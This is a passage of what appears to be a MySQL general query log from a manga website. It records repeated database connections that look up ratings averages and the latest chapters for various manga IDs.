chapters where manga_id = '240' order by created desc limit 1 330641128 Quit 330641129 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641129 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330641129 Quit 330641130 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641130 Query select * FROM chapters where manga_id = '50' order by created desc limit 1 330641130 Quit 330641131 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641131 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330641131 Quit 330641132 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641132 Query select * FROM chapters where manga_id = '27' order by created desc limit 1 330641132 Quit 330641133 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641133 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330641133 Quit 330641134 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641134 Query select * FROM chapters where manga_id = '92' order by created desc limit 1 330641134 Quit 330641135 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641135 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330641135 Quit 330641136 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641136 Query select * FROM chapters where manga_id = '289' order by created desc limit 1 330641136 Quit 330641137 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641137 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330641137 Quit 330641138 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641138 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330641138 Quit 330641139 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641139 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330641139 Quit 330641140 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641140 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330641140 Quit 330641141 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641141 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330641141 Quit 330641142 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641142 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330641142 Quit 330641143 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641143 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330641143 Quit 330641144 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641144 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330641144 Quit 330641145 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641145 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330641145 Quit 330641146 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641146 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330641146 Quit 330641147 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641147 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330641147 Quit 330641148 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641148 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330641148 Quit 330641149 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641149 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330641149 Quit 330641150 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641150 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330641150 Quit 330641151 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641151 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330641151 Quit 330641152 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641152 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330641152 Quit 330641153 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641153 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330641153 Quit 330641154 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641154 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330641154 Quit 330641155 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641155 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330641155 Quit 330641156 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641156 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330641156 Quit 330641157 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641157 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330641157 Quit 330641158 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641158 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330641158 Quit 330641159 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641159 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330641159 Quit 330641160 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641160 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330641160 Quit 330641161 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641161 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330641161 Quit 330641162 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641162 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330641162 Quit 330641163 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641163 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330641163 Quit 330641164 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641164 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330641164 Quit 330641165 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641165 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330641165 Quit 330641166 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641166 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330641166 Quit 330641167 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641167 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330641167 Quit 330641168 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641168 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330641168 Quit 330641169 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641169 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330641169 Quit 330641170 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641170 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330641170 Quit 330641171 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641171 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330641171 Quit 330641172 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641172 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330641172 Quit 330641173 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641173 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330641173 Quit 330641174 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641174 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330641174 Quit 330641175 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641175 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330641175 Quit 330641176 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641176 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330641176 Quit 330641177 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641177 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330641177 Quit 330641178 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641178 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330641178 Quit 330641179 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641179 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330641179 Quit 330641180 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641180 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330641180 Quit 330641181 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641181 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330641181 Quit 330641182 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641182 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330641182 Quit 330641183 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641183 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330641183 Quit 330641184 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641184 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330641184 Quit 330641185 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641185 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330641185 Quit 330641186 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641186 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330641186 Quit 330641187 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641187 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330641187 Quit 330641188 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641188 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330641188 Quit 330641189 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641189 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330641189 Quit 330641190 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641190 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330641190 Quit 330641191 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641191 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330641191 Quit 330641192 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641192 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330641192 Quit 330641193 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641193 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330641193 Quit 330641194 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641194 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330641194 Quit 330641195 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641195 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330641195 Quit 330641196 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641196 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330641196 Quit 330641197 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641197 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330641197 Quit 330641198 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641198 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330641198 Quit 330641199 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641199 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330641199 Quit 330641200 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641200 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330641200 Quit 330641201 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641201 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330641201 Quit 330641202 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641202 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330641202 Quit 330641203 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641203 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330641203 Quit 330641204 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641204 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330641204 Quit 330641205 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641205 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330641205 Quit 330641206 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641206 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330641206 Quit 330641207 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641207 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330641207 Quit 330641208 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641208 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330641208 Quit 330641209 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641209 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330641209 Quit 330641210 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641210 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330641210 Quit 330641211 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641211 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330641211 Quit 330641212 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641212 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330641212 Quit 330641213 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641213 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330641213 Quit 330641214 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641214 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330641215 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641215 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330641214 Quit 330641215 Quit 330641216 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641216 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330641216 Quit 330641217 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641217 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330641217 Quit 330641218 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641218 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330641218 Quit 330641219 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641219 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330641219 Quit 330641220 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641220 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330641220 Quit 330641221 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641221 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330641221 Quit 330641222 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330641222 Quit 330641223 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641223 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330641223 Quit 330641224 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641224 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330641224 Quit 330641225 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641225 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330641225 Quit 330641226 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641226 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330641226 Quit 330641227 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641227 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330641227 Quit 330641228 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330641228 Quit 330641229 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641229 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330641229 Quit 330641230 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330641230 Quit 330641231 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641231 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330641231 Quit 330641232 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330641232 Quit 330641233 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641233 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330641233 Quit 330641234 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641234 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330641234 Quit 330641235 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641235 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330641235 Quit 330641236 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330641236 Quit 330641237 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641237 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330641237 Quit 330641238 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641238 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330641238 Quit 330641239 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330641239 Quit 330641240 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330641240 Quit 330641241 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330641241 Quit 330641242 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641242 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330641242 Quit 330641243 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330641243 Quit 330641244 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330641244 Quit 330641245 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330641245 Quit 330641246 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330641246 Quit 330641247 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330641247 Quit 330641248 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330641248 Quit 330641249 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330641249 Quit 330641250 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641250 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330641250 Quit 330641251 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330641251 Quit 330641252 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330641252 Quit 330641253 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330641253 Quit 330641254 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641254 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330641254 Quit 330641255 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330641255 Quit 330641256 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641256 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330641256 Quit 330641257 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330641257 Quit 330641258 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641258 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330641258 Quit 330641259 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641259 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330641259 Quit 330641260 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641260 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330641260 Quit 330641261 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330641261 Quit 330641262 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330641262 Quit 330641263 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330641263 Quit 330641264 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641264 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330641264 Quit 330641265 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641265 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330641265 Quit 330641266 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330641266 Quit 330641267 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330641267 Quit 330641268 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330641268 Quit 330641269 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330641269 Quit 330641270 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330641270 Quit 330641271 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330641271 Quit 330641272 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330641272 Quit 330641273 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330641273 Quit 330641274 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330641274 Quit 330641275 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330641275 Quit 330641276 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330641276 Quit 330641277 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330641277 Quit 330641278 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641278 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330641278 Quit 330641279 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641279 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330641279 Quit 330641280 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330641280 Quit 330641281 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641281 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330641281 Quit 330641282 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641282 Query select count(id) as total_rating, (sum(rating) / count(id)) as 